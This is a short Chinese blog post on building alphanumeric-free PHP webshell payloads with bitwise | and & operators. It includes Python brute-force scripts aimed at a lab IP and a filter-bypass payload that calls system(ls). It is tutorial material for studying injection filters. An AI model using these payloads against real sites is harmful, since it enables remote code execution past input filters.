利用|和&来进行无数字webshell

Posted on 2020-06-05,2 min read 
import requests
from urllib.parse import unquote,quote
List=['0','1','2','3','4','5','6','7','8','9','A','B','C','D','E','F']
backlist='abcdefghijkmnlopqrstuvwxyzABCDEFGHIJKMNLOPQRSTUVWXYZ0123456789'
for a in List:
    for b in List:
        for c in List:
            for d in List:
                str1='%'+str(a)+str(b)
                str2='%'+str(c)+str(d)
                url='http://192.168.0.134/?code=echo (\''+str(str1)+'\'|\''+str(str2)+'\');'
                if (unquote(str1) not in backlist) and (unquote(str2) not in backlist):
                    try:
                        result=requests.get(url).text
                        print(str1+'|'+str2+'='+result)
                    except:
                        pass
                else:
                    pass

import requests
from urllib.parse import unquote,quote
List=['0','1','2','3','4','5','6','7','8','9','A','B','C','D','E','F']
backlist='abcdefghijkmnlopqrstuvwxyzABCDEFGHIJKMNLOPQRSTUVWXYZ0123456789'
for a in List:
    for b in List:
        for c in List:
            for d in List:
                str1='%'+str(a)+str(b)
                str2='%'+str(c)+str(d)
                url='http://192.168.0.134/?code=echo (\''+str(str1)+'\'%26\''+str(str2)+'\');'
                if (unquote(str1) not in backlist) and (unquote(str2) not in backlist):
                    try:
                        result=requests.get(url).text
                        print(str1+'&'+str2+'='+result)
                    except:
                        pass
                else:
                    pass

可以用

(%27%13%19%13%14%05%0D%27|%27``````%27)(%27%0C%13%27|%27``%27)
system(ls)

php5不支持(system)(ls)这种写法

($a='system').($a(ls))
这样写

可以用执行代码

${phpinfo()}

()相当于双引号的作用。把括号内的当作一个整体。用于区分
${}。执行大括号内的代码。然后结果再给变量
().()

下一篇: 原生类文件读取→